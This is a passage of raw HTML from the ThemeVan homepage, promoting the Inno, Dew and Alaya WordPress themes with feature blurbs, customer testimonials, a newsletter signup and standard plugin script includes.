data-lazy-src="https://www.themevan.com/main/wp-content/uploads/2014/03/theme.png?is-pending-load=1" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" /></div></figure></div></div></div></div></div><div class="vc_row-full-width"></div><div data-vc-full-width="true" data-vc-full-width-init="false" data-vc-stretch-content="true" class="vc_row wpb_row vc_row-fluid vc_custom_1527926867853 vc_row-has-fill vc_column-gap-30 vc_row_zindex_1 vc_row_opacity_1 vc_row-o-full-height vc_row-o-columns-middle vc_row-o-equal-height vc_row-o-content-middle vc_row-flex"><div class="wpb_column vc_column_container vc_col-sm-6"><div class="vc_column-inner vc_custom_1495565575766"><div class="wpb_wrapper"><div class="wpb_single_image wpb_content_element vc_align_left wpb_animate_when_almost_visible wpb_fadeInLeft fadeInLeft"><figure class="wpb_wrapper vc_figure"><div class="vc_single_image-wrapper vc_box_border_grey"><img width="900" height="680" src="https://www.themevan.com/main/wp-content/uploads/2018/06/inno.png" class="vc_single_image-img attachment-full jetpack-lazy-image" alt="" data-lazy-srcset="https://www.themevan.com/main/wp-content/uploads/2018/06/inno.png 900w, https://www.themevan.com/main/wp-content/uploads/2018/06/inno-300x227.png 300w, https://www.themevan.com/main/wp-content/uploads/2018/06/inno-768x580.png 768w" data-lazy-sizes="(max-width: 900px) 100vw, 900px" data-lazy-src="https://www.themevan.com/main/wp-content/uploads/2018/06/inno.png?is-pending-load=1" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" /></div></figure></div></div></div></div><div class="wpb_column vc_column_container vc_col-sm-6"><div class="vc_column-inner"><div class="wpb_wrapper"><h3 style="font-size: 3rem;text-align: left" class="vc_custom_heading wpb_animate_when_almost_visible wpb_bottom-to-top" ><strong>Inno</strong></h3><h4 style="font-size: 1.5rem;line-height: 1.4em;text-align: left" class="vc_custom_heading vc_custom_1551383994036 wpb_animate_when_almost_visible wpb_bottom-to-top" >Creative Multi-Purpose WordPress Theme</h4><div class="wpb_text_column wpb_content_element " ><div class="wpb_wrapper"><p>Inno is a Creative Multi-Purpose WordPress Theme. It provides the complete toolkit for any kinds of website building and comes with a tailored Elementor page builder. High customizability that allows you create almost any kinds of website.</p></div></div><div class="vc_btn3-container button_shadow wpb_animate_when_almost_visible wpb_fadeInUp fadeInUp vc_btn3-left" > <a style="background-color:#3e6edd; color:#ffffff;" class="vc_general vc_btn3 vc_btn3-size-md vc_btn3-shape-rounded vc_btn3-style-custom" href="https://www.themevan.com/item/inno-creative-multi-purpose-wordpress-theme/" title="">EXPLORE INNO THEME</a></div></div></div></div></div><div class="vc_row-full-width"></div><div data-vc-full-width="true" data-vc-full-width-init="false" data-vc-stretch-content="true" class="vc_row wpb_row vc_row-fluid vc_custom_1512114647288 vc_row-has-fill vc_column-gap-30 vc_row_zindex_1 vc_row_opacity_1 vc_row-o-full-height vc_row-o-columns-middle vc_row-o-equal-height vc_row-o-content-middle vc_row-flex"><div class="wpb_column vc_column_container vc_col-sm-6"><div class="vc_column-inner vc_custom_1495565575766"><div class="wpb_wrapper"><h3 style="font-size: 3rem;text-align: left" class="vc_custom_heading wpb_animate_when_almost_visible wpb_bottom-to-top" ><strong>DEW</strong></h3><h4 style="font-size: 1.5rem;line-height: 1.4em;text-align: left" class="vc_custom_heading vc_custom_1551384003466 wpb_animate_when_almost_visible wpb_bottom-to-top" >A Powerful Easy Digital Downloads Theme</h4><div class="wpb_text_column wpb_content_element " ><div class="wpb_wrapper"><p>Want to sell digital downloads on your own website? Dew is a powerful Easy Digital Downloads theme that allows you to launch a self-hosted digital shop quickly. Based on Easy Digital Downloads plugin, all common E-Commerce features are available to use. Don&#8217;t wait!</p></div></div><div class="vc_btn3-container button_shadow wpb_animate_when_almost_visible wpb_fadeInUp fadeInUp vc_btn3-left" > <a style="background-color:#3e6edd; color:#ffffff;" class="vc_general vc_btn3 vc_btn3-size-md vc_btn3-shape-rounded vc_btn3-style-custom" href="https://www.themevan.com/item/dew-easy-digital-downloads-wordpress-theme/" title="">START BUILDING YOUR DIGITAL SHOP</a></div></div></div></div><div class="wpb_column vc_column_container vc_col-sm-6"><div class="vc_column-inner vc_custom_1512111144516"><div class="wpb_wrapper"><div class="wpb_single_image wpb_content_element vc_align_left wpb_animate_when_almost_visible wpb_fadeInRight fadeInRight"><figure class="wpb_wrapper vc_figure"><div class="vc_single_image-wrapper vc_box_border_grey"><img width="900" height="680" src="https://www.themevan.com/main/wp-content/uploads/2018/06/dew.png" class="vc_single_image-img attachment-full jetpack-lazy-image" alt="" data-lazy-srcset="https://www.themevan.com/main/wp-content/uploads/2018/06/dew.png 900w, https://www.themevan.com/main/wp-content/uploads/2018/06/dew-300x227.png 300w, https://www.themevan.com/main/wp-content/uploads/2018/06/dew-768x580.png 768w" data-lazy-sizes="(max-width: 900px) 100vw, 900px" data-lazy-src="https://www.themevan.com/main/wp-content/uploads/2018/06/dew.png?is-pending-load=1" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" /></div></figure></div></div></div></div></div><div class="vc_row-full-width"></div><div data-vc-full-width="true" data-vc-full-width-init="false" data-vc-stretch-content="true" class="vc_row wpb_row vc_row-fluid vc_custom_1551384064963 vc_row-has-fill vc_column-gap-30 vc_row_zindex_1 vc_row_opacity_1 vc_row-o-full-height vc_row-o-columns-middle vc_row-o-equal-height vc_row-o-content-middle vc_row-flex"><div class="wpb_column vc_column_container vc_col-sm-6"><div class="vc_column-inner vc_custom_1495565575766"><div class="wpb_wrapper"><div class="wpb_single_image wpb_content_element vc_align_left wpb_animate_when_almost_visible wpb_fadeInLeft fadeInLeft"><figure class="wpb_wrapper vc_figure"><div class="vc_single_image-wrapper vc_box_border_grey"><img width="900" height="680" src="https://www.themevan.com/main/wp-content/uploads/2017/12/alaya.png" class="vc_single_image-img attachment-full jetpack-lazy-image" alt="" data-lazy-srcset="https://www.themevan.com/main/wp-content/uploads/2017/12/alaya.png 900w, https://www.themevan.com/main/wp-content/uploads/2017/12/alaya-300x227.png 300w, https://www.themevan.com/main/wp-content/uploads/2017/12/alaya-768x580.png 768w" data-lazy-sizes="(max-width: 900px) 100vw, 900px" data-lazy-src="https://www.themevan.com/main/wp-content/uploads/2017/12/alaya.png?is-pending-load=1" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" /></div></figure></div></div></div></div><div class="wpb_column vc_column_container vc_col-sm-6"><div class="vc_column-inner"><div class="wpb_wrapper"><h3 style="font-size: 3rem;text-align: left" class="vc_custom_heading wpb_animate_when_almost_visible wpb_bottom-to-top" ><strong>Alaya</strong></h3><h4 style="font-size: 1.5rem;line-height: 1.4em;text-align: left" class="vc_custom_heading vc_custom_1551384013165 wpb_animate_when_almost_visible wpb_bottom-to-top" >A Minimalist WooCommerce Shop WordPress Theme</h4><div class="wpb_text_column wpb_content_element " ><div class="wpb_wrapper"><p>Clean, elegant and easy to quickly launch your online shop in a few minutes. No too many options make you confuse,  no JS/CSS resource heavily, even no longer need to use the page builder, but compatible with the popular page builders. Simple and easy to get started to build a creative or fashion online store based on WordPress and WooCommerce.</p></div></div><div class="vc_btn3-container button_shadow wpb_animate_when_almost_visible wpb_fadeInUp fadeInUp vc_btn3-left" > <a style="background-color:#3e6edd; color:#ffffff;" class="vc_general vc_btn3 vc_btn3-size-md vc_btn3-shape-rounded vc_btn3-style-custom" href="https://www.themevan.com/item/alaya-minimalist-clean-woocommerce-theme/" title="">LAUNCH YOUR ONLINE SHOP</a></div></div></div></div></div><div class="vc_row-full-width"></div><div data-vc-full-width="true" data-vc-full-width-init="false" data-vc-stretch-content="true" class="vc_row wpb_row vc_row-fluid vc_custom_1495732753042 vc_row-has-fill vc_column-gap-35 vc_row_zindex_1 vc_row_opacity_1"><div class="wpb_column vc_column_container vc_col-sm-4"><div class="vc_column-inner"><div class="wpb_wrapper"><div class="vc_icon_element vc_icon_element-outer wpb_animate_when_almost_visible wpb_fadeInUp fadeInUp vc_icon_element-align-center"><div class="vc_icon_element-inner vc_icon_element-color-custom vc_icon_element-size-lg vc_icon_element-style- vc_icon_element-background-color-grey"> <span class="vc_icon_element-icon fa fa-television" style="color:#444444 !important"></span></div></div><h4 style="font-size: 1.2rem;line-height: 1.5em;text-align: center" class="vc_custom_heading wpb_animate_when_almost_visible wpb_bottom-to-top" >Fully Responsive</h4><div class="wpb_text_column wpb_content_element wpb_animate_when_almost_visible wpb_fadeInUp fadeInUp" ><div class="wpb_wrapper"><p style="text-align: center;">All our themes adapt perfectly for all device resolutions like mobile, tablet and desktop, so it&#8217;s both friendly with the users and Google.</p></div></div></div></div></div><div class="wpb_column vc_column_container vc_col-sm-4"><div class="vc_column-inner"><div class="wpb_wrapper"><div class="vc_icon_element vc_icon_element-outer wpb_animate_when_almost_visible wpb_fadeInUp fadeInUp vc_icon_element-align-center"><div class="vc_icon_element-inner vc_icon_element-color-custom vc_icon_element-size-lg vc_icon_element-style- vc_icon_element-background-color-grey"> <span class="vc_icon_element-icon fa fa-sliders" style="color:#444444 !important"></span></div></div><h4 style="font-size: 1.2rem;line-height: 1.5em;text-align: center" class="vc_custom_heading wpb_animate_when_almost_visible wpb_bottom-to-top" >Highly Customizable</h4><div class="wpb_text_column wpb_content_element wpb_animate_when_almost_visible wpb_fadeInUp fadeInUp" ><div class="wpb_wrapper"><p style="text-align: center;">We offer deep integration for the page builder in almost all of our themes, it allows you to easily customize the page layout, make your website looks unique.</p></div></div></div></div></div><div class="wpb_column vc_column_container vc_col-sm-4"><div class="vc_column-inner"><div class="wpb_wrapper"><div class="vc_icon_element vc_icon_element-outer wpb_animate_when_almost_visible wpb_fadeInUp fadeInUp vc_icon_element-align-center"><div class="vc_icon_element-inner vc_icon_element-color-custom vc_icon_element-size-lg vc_icon_element-style- vc_icon_element-background-color-grey"> <span class="vc_icon_element-icon fa fa-life-ring" style="color:#444444 !important"></span></div></div><h4 style="font-size: 1.2rem;line-height: 1.5em;text-align: center" class="vc_custom_heading wpb_animate_when_almost_visible wpb_bottom-to-top" >Fast Support</h4><div class="wpb_text_column wpb_content_element wpb_animate_when_almost_visible wpb_fadeInUp fadeInUp" ><div class="wpb_wrapper"><p style="text-align: center;">We provide 6 months free support for our theme buyers and lifetime updates. So you don&#8217;t worry about the trouble using or bugs, we are always nearby.</p></div></div></div></div></div></div><div class="vc_row-full-width"></div><div data-vc-full-width="true" data-vc-full-width-init="false" data-vc-stretch-content="true" class="vc_row wpb_row vc_row-fluid vc_custom_1495733040971 vc_row-has-fill vc_column-gap-35 vc_row_zindex_1 vc_row_opacity_1"><div class="wpb_column vc_column_container vc_col-sm-4"><div class="vc_column-inner vc_custom_1495732764929"><div class="wpb_wrapper"><div class="vc_icon_element vc_icon_element-outer wpb_animate_when_almost_visible wpb_fadeInUp fadeInUp vc_icon_element-align-center"><div class="vc_icon_element-inner vc_icon_element-color-custom vc_icon_element-size-lg vc_icon_element-style- vc_icon_element-background-color-grey"> <span class="vc_icon_element-icon fa fa-diamond" style="color:#444444 !important"></span></div></div><h4 style="font-size: 1.2rem;line-height: 1.5em;text-align: center" class="vc_custom_heading wpb_animate_when_almost_visible wpb_bottom-to-top" >Elegant Design</h4><div class="wpb_text_column wpb_content_element wpb_animate_when_almost_visible wpb_fadeInUp fadeInUp" ><div class="wpb_wrapper"><p style="text-align: center;">We try our best to design each pixel with love, simplify our page design, and get rid of everything that isn’t necessary.</p></div></div></div></div></div><div class="wpb_column vc_column_container vc_col-sm-4"><div class="vc_column-inner vc_custom_1495732770031"><div class="wpb_wrapper"><div class="vc_icon_element vc_icon_element-outer wpb_animate_when_almost_visible wpb_fadeInUp fadeInUp vc_icon_element-align-center"><div class="vc_icon_element-inner vc_icon_element-color-custom vc_icon_element-size-lg vc_icon_element-style- vc_icon_element-background-color-grey"> <span class="vc_icon_element-icon fa fa-smile-o" style="color:#444444 !important"></span></div></div><h4 style="font-size: 1.2rem;line-height: 1.5em;text-align: center" class="vc_custom_heading wpb_animate_when_almost_visible wpb_bottom-to-top" >User Friendly</h4><div class="wpb_text_column wpb_content_element wpb_animate_when_almost_visible wpb_fadeInUp fadeInUp" ><div class="wpb_wrapper"><p style="text-align: center;">We know our clients need a theme which is actually easy to use, so we make our themes simple to install and fast to set up.</p></div></div></div></div></div><div class="wpb_column vc_column_container vc_col-sm-4"><div class="vc_column-inner vc_custom_1495732774716"><div class="wpb_wrapper"><div class="vc_icon_element vc_icon_element-outer wpb_animate_when_almost_visible wpb_fadeInUp fadeInUp vc_icon_element-align-center"><div class="vc_icon_element-inner vc_icon_element-color-custom vc_icon_element-size-lg vc_icon_element-style- vc_icon_element-background-color-grey"> <span class="vc_icon_element-icon fa fa-folder-open" style="color:#444444 !important"></span></div></div><h4 style="font-size: 1.2rem;line-height: 1.5em;text-align: center" class="vc_custom_heading wpb_animate_when_almost_visible wpb_bottom-to-top" >Well Documented</h4><div class="wpb_text_column wpb_content_element wpb_animate_when_almost_visible wpb_fadeInUp fadeInUp" ><div class="wpb_wrapper"><p>We write the detailed documentation for each product, it’s a useful guide to help the users to setup their website.</p></div></div></div></div></div></div><div class="vc_row-full-width"></div><div data-vc-full-width="true" data-vc-full-width-init="false" data-vc-stretch-content="true" data-vc-parallax="1.5" class="vc_row wpb_row vc_row-fluid vc_custom_1551384574947 vc_row-has-fill vc_row_zindex_1 vc_row_opacity_1 vc_row-o-content-middle vc_row-flex vc_general vc_parallax vc_parallax-content-moving"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper"><p style="font-size: 5rem;color: #ffffff;line-height: 1.2em;text-align: center;font-family:Lato;font-weight:100;font-style:normal" class="vc_custom_heading vc_custom_1512101379614 wpb_animate_when_almost_visible wpb_appear" data-mobile-font-size="26px" data-mobile-line-height="1.2em" >9000+</p><h2 style="font-size: 46px;color: #ffffff;line-height: 1.2em;text-align: center" class="vc_custom_heading vc_custom_1495568496008 wpb_animate_when_almost_visible wpb_bottom-to-top" data-mobile-font-size="26px" data-mobile-line-height="1.2em" >Customers Trust ThemeVan</h2><p style="font-size: 26px;color: #fcfcfc;line-height: 1.5em;text-align: center;font-family:Lato;font-weight:300;font-style:normal" class="vc_custom_heading vc_custom_1495568686177 wpb_animate_when_almost_visible wpb_bottom-to-top" data-mobile-font-size="16px" data-mobile-line-height="1.5em" >Here's what they are saying</p><div class="custom_testimonials wpb_animate_when_almost_visible wpb_bottom-to-top white "><div id="testimonial-cRm5An48U2" class="swiper-container"><div class="swiper-wrapper"><div class="swiper-slide"> <img src="https://www.themevan.com/main/wp-content/uploads/2014/03/customer-1.jpg" alt="Kaydennguyen" class="avatar" /><div class="testimonial-text"> The support team for this theme is AWESOME! I have never have an issue when I reached out for guidance and support in term of features and functionality. The response was promptly and the instructions are super easy to follow. KUDO!</div><footer class="testimonial-author"> - Kaydennguyen</footer></div><div class="swiper-slide"> <img src="https://www.themevan.com/main/wp-content/uploads/2014/03/customer-2.jpg" alt="Beeonlinenz" class="avatar" /><div class="testimonial-text"> Excellent theme - I've had really bad experiences in the past getting themes looking how they do in the demo, but this theme was very intuitive and any questions I had were answered by the documentation. Nice job. 🙂</div><footer class="testimonial-author"> - Beeonlinenz</footer></div><div class="swiper-slide"> <img src="https://www.themevan.com/main/wp-content/uploads/2014/03/customer-4.jpg" alt="Toggery Bob" class="avatar" /><div class="testimonial-text"> I've never had a theme developer act so quickly on support tickets.<br /> This may be the only theme I buy again for future websites.<br /> Excellent job!</div><footer class="testimonial-author"> - Toggery Bob</footer></div><div class="swiper-slide"> <img src="https://www.themevan.com/main/wp-content/uploads/2014/03/customer-3.jpg" alt="Leeang Woo" class="avatar" /><div class="testimonial-text"> You can always get in touch with the developer via his forums and the documentation gets you through the basics. It's simple to set up and work with.</div><footer class="testimonial-author"> - Leeang Woo</footer></div></div><div class="swiper-pagination"></div></div></div><script type="text/javascript">jQuery(document).ready(function ($) { var swiper = new Swiper("#testimonial-cRm5An48U2", { pagination: ".swiper-pagination", paginationClickable: true, slidesPerView: "auto" }); });</script></div></div></div></div><div class="vc_row-full-width"></div></div></div></div><div id="site-bottom" class="site-bottom"><div class="dgw-grid-1000"><div class="bottom-widget dgw-grid dgw-col3"><aside id="nav_menu-5" class="widget widget_nav_menu"><h2 class="widget-title">ThemeVan</h2><div class="menu-themevan-container"><ul id="menu-themevan" class="menu"><li id="menu-item-2336" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2336"><a href="https://www.themevan.com/about/">About</a></li><li id="menu-item-2331" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2331"><a href="https://www.themevan.com/support/">Support</a></li><li id="menu-item-2337" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2337"><a href="https://www.themevan.com/contact/">Contact</a></li><li id="menu-item-30755" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-privacy-policy menu-item-30755"><a href="https://www.themevan.com/privacy-policy/">Privacy Policy</a></li><li id="menu-item-2343" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2343"><a href="https://www.themevan.com/term-conditions/">Term and Conditions</a></li><li id="menu-item-2332" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2332"><a href="https://www.themevan.com/support-policy/">Support Policy</a></li><li id="menu-item-31140" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-31140"><a href="https://www.themevan.com/affiliates/">Affiliates Program</a></li><li id="menu-item-2862" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2862"><a href="https://www.themevan.com/hosting/">Hosting</a></li></ul></div></aside></div><div class="bottom-widget dgw-grid dgw-col3"><aside id="nav_menu-4" class="widget widget_nav_menu"><h2 class="widget-title">Theme Categories</h2><div class="menu-theme-categories-container"><ul id="menu-theme-categories" class="menu"><li id="menu-item-9984" class="menu-item menu-item-type-taxonomy menu-item-object-download_tag menu-item-9984"><a href="https://www.themevan.com/item/tag/business-themes/">Business</a></li><li id="menu-item-9985" class="menu-item menu-item-type-taxonomy menu-item-object-download_tag menu-item-9985"><a href="https://www.themevan.com/item/tag/portfolio-themes/">Portfolio</a></li><li id="menu-item-9981" class="menu-item menu-item-type-taxonomy menu-item-object-download_tag menu-item-9981"><a href="https://www.themevan.com/item/tag/e-commerce-themes/">E-Commerce</a></li><li id="menu-item-9979" class="menu-item menu-item-type-taxonomy menu-item-object-download_tag menu-item-9979"><a href="https://www.themevan.com/item/tag/blog-themes/">Blog</a></li><li id="menu-item-9982" class="menu-item menu-item-type-taxonomy menu-item-object-download_tag menu-item-9982"><a href="https://www.themevan.com/item/tag/news-magazine-themes/">News &#038; Magazine</a></li><li id="menu-item-9983" class="menu-item menu-item-type-taxonomy menu-item-object-download_tag menu-item-9983"><a href="https://www.themevan.com/item/tag/free-themes/">Free Themes</a></li></ul></div></aside></div><div class="bottom-widget dgw-grid dgw-col6 last"><aside id="mailster_signup-2" class="widget widget_mailster_signup"><h2 class="widget-title">SUBSCRIBE TO NEWSLETTER</h2><div class="mailster-widget mailster-widget-signup"><div class="mailster-widget-text mailster-widget-text-before">Subscribe to our newsletter so you won’t miss our great premium wordpress themes or the other products and interesting things to share!</div><form action="https://www.themevan.com/mailster/subscribe" method="post" class="mailster-form mailster-form-submit mailster-ajax-form mailster-in-widget mailster-form-1"><input name="_action" type="hidden" value="subscribe"> <input name="_referer" type="hidden" value="https://www.themevan.com/"> <input name="_nonce" type="hidden" value="ccfcfaaf7a"> <input name="formid" type="hidden" value="1"><div class="mailster-form-fields"><div class="mailster-wrapper mailster-email-wrapper"><input id="mailster-email-1" name="email" type="email" value="" placeholder="Email *" class="input mailster-email mailster-required" aria-required="true" aria-label="Email" spellcheck="false"></div><div class="mailster-wrapper mailster-submit-wrapper form-submit"><input name="submit" type="submit" value="Subscribe" class="submit-button button" aria-label="Subscribe"></div></div></form></div></aside></div></div></div><footer id="colophon" class="site-footer"><div class="site-info dgw-grid-1000">Copyright &copy; 2019 ThemeVan. All right reserved. <br/> Powered by Mofect Limited.</div></footer><div id="dgw_popup"> <a id="dgw_popup_close">&times;</a><div id="dgw_search" class="popup_content"><h3>Search Products</h3><form role="search" method="get" id="searchform" class="searchform" action="https://www.themevan.com/" ><div> <select id="search_type" name="post_type"><option value="download">Product</option><option value="post">Blog</option> </select> <input type="text" id="search_product" placeholder="Start typing and press Enter to search" value="" name="s" /></div></form></div></div><nav id="mobile_menu" class="pushy pushy-right"><div class="account"><div class="avatar"><img alt src="https://secure.gravatar.com/avatar/?s=100&#038;d=mm&#038;r=g" class="avatar avatar-100 photo avatar-default jetpack-lazy-image" height="100" width="100" data-lazy-srcset="https://secure.gravatar.com/avatar/?s=200&#038;d=mm&#038;r=g 2x" data-lazy-src="https://secure.gravatar.com/avatar/?s=100&amp;is-pending-load=1#038;d=mm&#038;r=g" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"><noscript><img alt='' src='https://secure.gravatar.com/avatar/?s=100&#038;d=mm&#038;r=g' srcset='https://secure.gravatar.com/avatar/?s=200&#038;d=mm&#038;r=g 2x' class='avatar avatar-100 photo avatar-default' height='100' width='100' /></noscript></div><a href="https://www.themevan.com/?page_id=873" class="dgw-login">Login</a><a href="https://www.themevan.com/?page_id=5" class="cart"><i class="fa fa-shopping-cart"></i>Cart</a></div><ul><li><a href="javascript:void(0);" id="close-menu"><i class="fa fa-close"></i></a></li><li id="menu-item-2326" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item current_page_item menu-item-home menu-item-2326"><a href="https://www.themevan.com/" aria-current="page">Home</a></li><li id="menu-item-33031" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-33031"><a href="https://www.themevan.com/wordpress-themes/">Themes</a></li><li id="menu-item-33116" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-33116"><a href="https://www.themevan.com/wordpress-development-service/">Development Service</a></li><li id="menu-item-2341" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2341"><a href="https://www.themevan.com/support/">Support</a></li><li id="menu-item-9339" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-9339"><a href="https://www.themevan.com/blog/">Blog</a></li><li id="menu-item-2339" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2339"><a href="https://www.themevan.com/contact/">Contact</a></li></ul></nav><div class="site-overlay"></div><div id="pum-31494" class="pum pum-overlay pum-theme-30941 pum-theme-bottom-left popmake-overlay pum-overlay-disabled auto_open click_open" data-popmake="{&quot;id&quot;:31494,&quot;slug&quot;:&quot;newsletter-popup&quot;,&quot;theme_id&quot;:30941,&quot;cookies&quot;:[{&quot;event&quot;:&quot;on_popup_close&quot;,&quot;settings&quot;:{&quot;name&quot;:&quot;When Close&quot;,&quot;key&quot;:&quot;&quot;,&quot;session&quot;:true,&quot;time&quot;:&quot;1 month&quot;,&quot;path&quot;:true}},{&quot;event&quot;:&quot;pum_sub_form_success&quot;,&quot;settings&quot;:{&quot;name&quot;:&quot;When Subscribe Successful&quot;,&quot;key&quot;:&quot;&quot;,&quot;session&quot;:false,&quot;time&quot;:&quot;1 month&quot;,&quot;path&quot;:true}},{&quot;event&quot;:&quot;pum_sub_form_already_subscribed&quot;,&quot;settings&quot;:{&quot;name&quot;:&quot;When Subscribed&quot;,&quot;key&quot;:&quot;&quot;,&quot;session&quot;:false,&quot;time&quot;:&quot;1 month&quot;,&quot;path&quot;:true}}],&quot;triggers&quot;:[{&quot;type&quot;:&quot;auto_open&quot;,&quot;settings&quot;:{&quot;cookie_name&quot;:[&quot;When Close&quot;,&quot;When Subscribe Successful&quot;,&quot;When Subscribed&quot;],&quot;delay&quot;:&quot;1000&quot;}},{&quot;type&quot;:&quot;click_open&quot;,&quot;settings&quot;:{&quot;extra_selectors&quot;:&quot;&quot;,&quot;cookie_name&quot;:null}}],&quot;mobile_disabled&quot;:null,&quot;tablet_disabled&quot;:null,&quot;meta&quot;:{&quot;display&quot;:{&quot;stackable&quot;:false,&quot;overlay_disabled&quot;:&quot;1&quot;,&quot;scrollable_content&quot;:false,&quot;disable_reposition&quot;:false,&quot;size&quot;:&quot;small&quot;,&quot;responsive_min_width&quot;:&quot;0%&quot;,&quot;responsive_min_width_unit&quot;:false,&quot;responsive_max_width&quot;:&quot;100%&quot;,&quot;responsive_max_width_unit&quot;:false,&quot;custom_width&quot;:&quot;640px&quot;,&quot;custom_width_unit&quot;:false,&quot;custom_height&quot;:&quot;380px&quot;,&quot;custom_height_unit&quot;:false,&quot;custom_height_auto&quot;:false,&quot;location&quot;:&quot;left bottom&quot;,&quot;position_from_trigger&quot;:false,&quot;position_top&quot;:&quot;0&quot;,&quot;position_left&quot;:&quot;0&quot;,&quot;position_bottom&quot;:&quot;0&quot;,&quot;position_right&quot;:&quot;0&quot;,&quot;position_fixed&quot;:&quot;1&quot;,&quot;animation_type&quot;:&quot;slide&quot;,&quot;animation_speed&quot;:&quot;350&quot;,&quot;animation_origin&quot;:&quot;left bottom&quot;,&quot;overlay_zindex&quot;:false,&quot;zindex&quot;:&quot;1999999999&quot;},&quot;close&quot;:{&quot;text&quot;:&quot;&quot;,&quot;button_delay&quot;:&quot;0&quot;,&quot;overlay_click&quot;:false,&quot;esc_press&quot;:false,&quot;f4_press&quot;:false},&quot;click_open&quot;:[]}}" role="dialog" aria-hidden="true" aria-labelledby="pum_popup_title_31494"><div id="popmake-31494" class="pum-container popmake theme-30941 pum-responsive pum-responsive-small responsive size-small pum-position-fixed"><div id="pum_popup_title_31494" class="pum-title popmake-title"> Get 20% Discount Code Now!</div><div class="pum-content popmake-content"><p>Subscribe to our newsletter,  receive the 20% discount code immediately, stay tuned for our promotion and product news! Don&#8217;t worry, we promise no spam.</p><form action="https://www.themevan.com/mailster/subscribe" method="post" class="mailster-form mailster-form-submit mailster-ajax-form mailster-form-1"><input name="_action" type="hidden" value="subscribe"> <input name="_referer" type="hidden" value="https://www.themevan.com/"> <input name="_nonce" type="hidden" value="ccfcfaaf7a"> <input name="formid" type="hidden" value="1"><div class="mailster-form-fields"><div class="mailster-wrapper mailster-email-wrapper"><input id="mailster-email-1" name="email" type="email" value="" placeholder="Email *" class="input mailster-email mailster-required" aria-required="true" aria-label="Email" spellcheck="false"></div><div class="mailster-wrapper mailster-submit-wrapper form-submit"><input name="submit" type="submit" value="Subscribe" class="submit-button button" aria-label="Subscribe"></div></div></form></div> <button type="button" class="pum-close popmake-close" aria-label="Close"> × </button></div></div><div style="display:none"></div> <script type='text/javascript' src='https://www.themevan.com/main/wp-content/plugins/mailster/assets/js/form.min.js'></script> <script type='text/javascript' src='https://www.themevan.com/main/wp-content/plugins/bbpress/templates/default/js/editor.js'></script> <script type='text/javascript'>var wpcf7 = {"apiSettings":{"root":"https:\/\/www.themevan.com\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"}};</script> <script type='text/javascript' src='https://www.themevan.com/main/wp-content/plugins/contact-form-7/includes/js/scripts.js'></script> <script type='text/javascript'>var edd_scripts = {"ajaxurl":"https:\/\/www.themevan.com\/main\/wp-admin\/admin-ajax.php","position_in_cart":"","has_purchase_links":"","already_in_cart_message":"You have already added this item to your cart","empty_cart_message":"Your cart is empty","loading":"Loading","select_option":"Please select an option","is_checkout":"0","default_gateway":"paypal","redirect_to_checkout":"1","checkout_page":"https:\/\/www.themevan.com\/checkout\/","permalinks":"1","quantities_enabled":"","taxes_enabled":"0"};</script> <script type='text/javascript' src='https://www.themevan.com/main/wp-content/plugins/easy-digital-downloads/assets/js/edd-ajax.min.js'></script> <script type='text/javascript' src='https://s0.wp.com/wp-content/js/devicepx-jetpack.js'></script> <script type='text/javascript' src='https://secure.gravatar.com/js/gprofiles.js'></script> <script type='text/javascript'>var WPGroHo = {"my_hash":""};</script> <script type='text/javascript' src='https://www.themevan.com/main/wp-content/plugins/jetpack/modules/wpgroho.js'></script> <script type='text/javascript' src='https://www.themevan.com/main/wp-includes/js/imagesloaded.min.js'></script> <script type='text/javascript' src='https://www.themevan.com/main/wp-includes/js/masonry.min.js'></script> <script type='text/javascript' src='https://www.themevan.com/main/wp-content/themes/dgwork/inc/assets/js/plugins.js'></script> <script type='text/javascript'>var dgwork_data = {"sticky_top":"1","register_text":"Register","menu_select_text":"Please Select","currency":"$"};</script> <script type='text/javascript' src='https://www.themevan.com/main/wp-content/themes/dgwork/assets/js/theme.js'></script> <script type='text/javascript' src='https://www.themevan.com/main/wp-content/themes/dgwork/inc/assets/js/swiper/swiper.jquery.min.js'></script> <script type='text/javascript' src='https://www.themevan.com/main/wp-content/themes/dgwork/inc/assets/js/plyr/plyr.js'></script> <script type='text/javascript' src='https://www.themevan.com/main/wp-content/themes/dgwork/assets/js/dgwork_edd.js'></script> <script type='text/javascript' src='https://www.themevan.com/main/wp-content/plugins/vc_responsive_pro//assets/js/script.js'></script> <script type='text/javascript' src='https://www.themevan.com/main/wp-content/plugins/jetpack/_inc/build/lazy-images/js/lazy-images.min.js'></script> <script type='text/javascript' src='https://www.themevan.com/main/wp-includes/js/jquery/ui/core.min.js'></script> <script type='text/javascript' src='https://www.themevan.com/main/wp-includes/js/jquery/ui/position.min.js'></script> <script type='text/javascript'>var pum_vars = {"version":"1.8.5","ajaxurl":"https:\/\/www.themevan.com\/main\/wp-admin\/admin-ajax.php","restapi":"https:\/\/www.themevan.com\/wp-json\/pum\/v1","rest_nonce":null,"default_theme":"30936","debug_mode":"","disable_tracking":"","home_url":"\/","message_position":"top","core_sub_forms_enabled":"1","popups":[]}; var ajaxurl = "https:\/\/www.themevan.com\/main\/wp-admin\/admin-ajax.php"; var 